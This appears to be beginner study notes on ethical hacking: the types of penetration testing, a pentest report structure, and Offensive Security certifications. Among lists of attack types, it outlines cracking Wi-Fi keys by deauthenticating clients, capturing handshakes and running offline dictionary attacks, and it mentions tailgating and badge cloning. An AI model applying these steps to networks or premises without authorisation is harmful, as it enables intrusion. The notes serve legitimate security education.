Basic terminologies of ethical hacking
what is offensive security?
offensive security: using ethical cybersecurity techniques to make an organization's security robust, this mainly includes various types of penetration testing, and writing a report, and I will discuss those down.
Facets of penetration testing:
Network penetration:
this focuses on the physical aspects of the target, finding network vulnerabilities, risk assessment and ensuring network security.
modems, computers and access points
Firewall misconfiguration and firewall bypass
IPS/IDS evasion
Router attacks
DNS-level attacks
Zone transfer attacks
Switching or routing-based attacks
SSH attacks
Proxy server attacks
Attacks on unnecessary open ports
Database attacks
Man-in-the-middle (MitM) attacks
FTP/SMTP-based attacks
Application pentesting:
getting into the application that is used by the organization, including the plugins and logical structure, such as source code, databases, backend of the application.
Types:
App penetration testing
Web penetration testing
3 Steps:
Reconnaissance: gathering info about web servers, os, resources used by the application
Discovery: finding vulnerabilites and planning attack vectors of the application
Attack: exploiting a vulnerability
Wireless penetration:
determining the security of wifi networks within a premises for various vulnerabilites is called wireless pentest.
the devices connected to the wireless networks and IoT devices as well within a business wifi
steps:
- Reconnaissance / information gathering (War driving) for wifi networks
A car or any other transportation vehicle.
A laptop and a Wi-Fi antenna.
Wireless network adapter.
Packet capture and analysis software.
Vulnerability Research ( most common 4-way handshake process vulnerability)
Attack/Exploitation → using Airplay NG suite tool
De-authenticating a legitimate client.
Capturing the initial 4-way handshake when the legitimate client reconnects.
Running an offline dictionary attack to crack the captured key.
Physical pentesting:
When someone has physical access to server rooms and sensitive facility within a building, one can attack from within.
using social engineering
tailgating
badge cloning
Social engineering:
The weakest link of the security chain are the people within an organization, they can be used by phising, spoofing, USB dropping
Client-Side attacks:
Attackers often compromise client-side software to gain access to company infrastructure.
Perform client-side testing to identify specific network attacks, such as:
Cross-site scripting attacks (XSS)
Clickjacking attacks
Cross-origin resource sharing (CORS)
Form hijacking
HTML injection
Open redirection
Malware infection
Red Teaming:
Regular penetration tests are important, but they don’t provide realistic conditions, such as combined attack techniques. Red teaming allows security teams to assess the overall environment and understand how its components function together. It requires critical thinking to identify new, complex vulnerabilities.
Report writing:
content of report
Goal
Time: include timestamps of various activities
audience: should have specific audience
Classify: classify the document as it contains secret information.
distribution: total number of copies generated and id of people you sent the report to, as the information is confidential
Methods of report:
make a draft with all information about the steps you took
proof read before presenting
Structure of report:
Executive Summary
Scope and Limitations of the Project
Objectives
Assumptions
Timeline
Summary of Results
Summary of Suggestions
Methodology
Plan Formulation
Execution of the Attack
Reporting
Findings
Detailed Information
References
Appendix
some specialization
Once you get the basics of each penetration testing, you can opt for specialization, some include
OSCP offensive security certified professional
these are part of one path
OSEP offensive security evasive professional
OSWE offensive security web exploitation
OSED: offensive security exploitation developer